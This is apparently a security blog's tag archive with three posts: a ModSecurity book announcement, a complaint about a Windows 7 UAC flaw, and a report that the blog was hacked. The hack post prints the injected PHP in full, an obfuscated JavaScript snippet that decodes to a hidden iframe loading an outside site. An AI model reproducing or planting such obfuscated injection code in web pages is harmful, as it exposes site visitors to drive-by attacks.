Tag Archives: Injection

New book about ModSecurity

There will be a new book about mod-security coming out :  ModSecurity 2.5.

ModSecurity is essential when it comes to secure any web site.

It will make the work of the attacker much harder and  it may save you even if your favorite dynamic pages have a security hole.
However, it must be configured wisely to be efficient. It is just a firewall that works at the application layer : you need to know the attacker point of view and the basics before writing any mod-security rules, otherwise at best it will useless (and at worst, it will kick legitimate traffic off).

So, stay tuned :  I will talk more about the ModSecurity stuff and publish a review about this book soon.


Windows 7 UAC security design flaw

Video of a dummy vulnerability on Windows 7 . More info there.

It is incredible that Microsoft invests so much money in its security and that there are still such a bad security design for programs that in no way should be granted any administrator access (calc.exe or notepad.exe).

Also, I can’t imagine that no one could detect it in their teams during the quality process and security audit.

What the hell are they doing ?

Hacked !

This blog got hacked yesterday.

It looks like some spammer managed to inject some PHP code into almost all *.php files of WordPress.
It was not just like the classic SQL injection that is usually used to post some malicious post.

The following code was added :

<?php echo '<script type="text/javascript">function count(str){var res = "";for(i = 0; i < str.length; ++i) { n = str.charCodeAt(i); res += String.fromCharCode(n - (2)); } return res; }; document.write(count(">khtcog\"ute?jvvr<11yyy0yr/uvcvu/rjr0kphq1khtcog1yr/uvcvu0rjr\"ykfvj?3\"jgkijv?3\"htcogdqtfgt?2@"));</script>';?>

Continue reading